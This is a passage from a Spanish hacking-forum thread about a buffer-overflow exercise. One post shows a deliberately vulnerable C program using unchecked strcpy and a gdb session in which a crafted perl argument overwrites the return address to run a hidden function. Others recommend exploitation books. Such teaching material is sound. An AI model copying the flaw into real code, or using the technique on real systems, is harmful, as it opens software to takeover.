elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Duda sobre buffer overflow
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] 3 Ir Abajo Respuesta Imprimir
Autor Tema: Duda sobre buffer overflow  (Leído 13,148 veces)
buscador-tecnologico

Desconectado Desconectado

Mensajes: 13


Ver Perfil
Re: Duda sobre buffer overflow
« Respuesta #10 en: 25 Diciembre 2011, 19:42 pm »

ostias, y ese libro? parece interesante,no? el titulo del libro es: shellcoders sobre exploits? de que escritor?


100000 gracias y feliz navidad amigos!
En línea

Sagrini

Desconectado Desconectado

Mensajes: 107


Ver Perfil WWW
Re: Duda sobre buffer overflow
« Respuesta #11 en: 1 Enero 2012, 18:16 pm »

Ahora mismo estoy un poco liadillo, te paso una url que tal vez te sirva y en un ratillo me pongo ;)
http://foro.elhacker.net/bugs_y_exploits/first_bof_linux_attack_sagrini_2010_elhackernet_funciona-t317514.0.html
« Última modificación: 1 Enero 2012, 20:52 pm por Sagrini » En línea

pianista
Colaborador
***
Desconectado Desconectado

Mensajes: 5.654


Hacking Wireless Live!


Ver Perfil WWW
Re: Duda sobre buffer overflow
« Respuesta #12 en: 1 Enero 2012, 19:40 pm »

Muchas gracias  ;)

Te lo agradezco

Saludos
En línea

AlbertoBSD
Programador y
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.705


🏴 Libertad!!!!!


Ver Perfil WWW
Re: Duda sobre buffer overflow
« Respuesta #13 en: 1 Enero 2012, 20:13 pm »

Pianista muy buenos dias, y exito este año!

¿Que libro estas siguiendo?

La idea es la misma, sobreescribir la direccion de retorno con aquella que quieras que se ejecute, en este caso quieres que se ejecute 2 veces el printf dentro de la funcion return_input

Saludos.
En línea

Sagrini

Desconectado Desconectado

Mensajes: 107


Ver Perfil WWW
Re: Duda sobre buffer overflow
« Respuesta #14 en: 1 Enero 2012, 23:03 pm »

Código
  1. #include <stdio.h>
  2. #include <string.h>
  3. #include <stdlib.h>
  4.  
  5. int vuln (char *buff)
  6. {
  7.    char buffer [36];
  8.    strcpy (buffer, buff);
  9. }
  10.  
  11. int main (int argc, char *argv [])
  12. {
  13.    vuln (argv [1]);
  14. }
  15.  
  16. int feo ()
  17. {
  18.    printf ("Eres feo!!!");
  19.    exit (0);
  20. }
  21.  
Código:
sagrini@pc11-1:~/Escritorio$ nano code.c
sagrini@pc11-1:~/Escritorio$ gcc -o code code.c --no-stack-protector
sagrini@pc11-1:~/Escritorio$ gdb -q code
(gdb) r $(perl -e 'print "A"x36 . "BBBB"x3')
Program received signal SIGSEGV, Segmentation fault.
0x08048408 in __do_global_dtors_aux ()
(gdb)
(gdb) x/x feo
0x8048489 <feo>: 0x83e58955
(gdb) x/x feo
0x8048489 <feo>: 0x83e58955
(gdb) r $(perl -e 'print "\x90"x36 . "\x89\x84\x04\x08"x5')
Eres feo!!!
(gdb) quit
sagrini@pc11-1:~/Escritorio$

Ahora modifico para que funcione con una shellcode ;)
« Última modificación: 1 Enero 2012, 23:06 pm por Sagrini » En línea

adulti

Desconectado Desconectado

Mensajes: 10


Ver Perfil WWW
Re: Duda sobre buffer overflow
« Respuesta #15 en: 5 Enero 2012, 02:53 am »

¿Que libro estas siguiendo?

La idea es la misma, sobreescribir la direccion de retorno con aquella que quieras que se ejecute, en este caso quieres que se ejecute 2 veces el printf dentro de la funcion return_input
En línea

AlbertoBSD
Programador y
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.705


🏴 Libertad!!!!!


Ver Perfil WWW
Re: Duda sobre buffer overflow
« Respuesta #16 en: 5 Enero 2012, 16:08 pm »

Funciono?
En línea

Sagrini

Desconectado Desconectado

Mensajes: 107


Ver Perfil WWW
Re: Duda sobre buffer overflow
« Respuesta #17 en: 5 Enero 2012, 17:38 pm »

El que? Lo mio, perfectamente.
Os recomiendo el libro "Hacking, técnicas avanzadas", de Jon Erickson. Es buenisimo.
En línea

<<<-Basura->>>


Desconectado Desconectado

Mensajes: 388



Ver Perfil
Re: Duda sobre buffer overflow
« Respuesta #18 en: 7 Enero 2012, 04:51 am »

Mm.. se que el comentario no viene al caso, pero podrías pasar el link del libro para descargarlo y yo también leerlo  :huh:
En línea

<<<--Basura-->>>
pianista
Colaborador
***
Desconectado Desconectado

Mensajes: 5.654


Hacking Wireless Live!


Ver Perfil WWW
Re: Duda sobre buffer overflow
« Respuesta #19 en: 8 Enero 2012, 19:56 pm »

Disculpad, las fiestas navideñas es lo que tienen, ya estoy de nuevo por aquí jeje.

Ahora lo voy a probar que he estado liado desde entonces.

El libro es: The Shellcoders handbook

Lo compré en amazon aunque tiene bastantes años.

Luego por otro lado había uno muy majo que era el de The art of exploitation o algo así.

Saludos
En línea

Páginas: 1 [2] 3 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
buffer overflow
Ingeniería Inversa
Meg 2 6,062 Último mensaje 6 Febrero 2009, 11:20 am
por Shaddy
Duda Buffer Overflow
Bugs y Exploits
R007h 2 3,845 Último mensaje 17 Mayo 2010, 00:52 am
por dark_hat
una duda acerca del buffer overflow. « 1 2 »
Bugs y Exploits
black_flowers 10 8,087 Último mensaje 7 Abril 2011, 17:29 pm
por black_flowers
sobre la entrada GHOST: glibc: buffer overflow en gethostbyname CVE-2015-0235
Seguridad
1quark1 5 3,162 Último mensaje 7 Febrero 2015, 20:53 pm
por .(sWeEtHaCk).
Duda explotando un buffer overflow en el stack
Bugs y Exploits
M3LiNdR1 3 5,230 Último mensaje 9 Febrero 2024, 23:47 pm
por M3LiNdR1
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines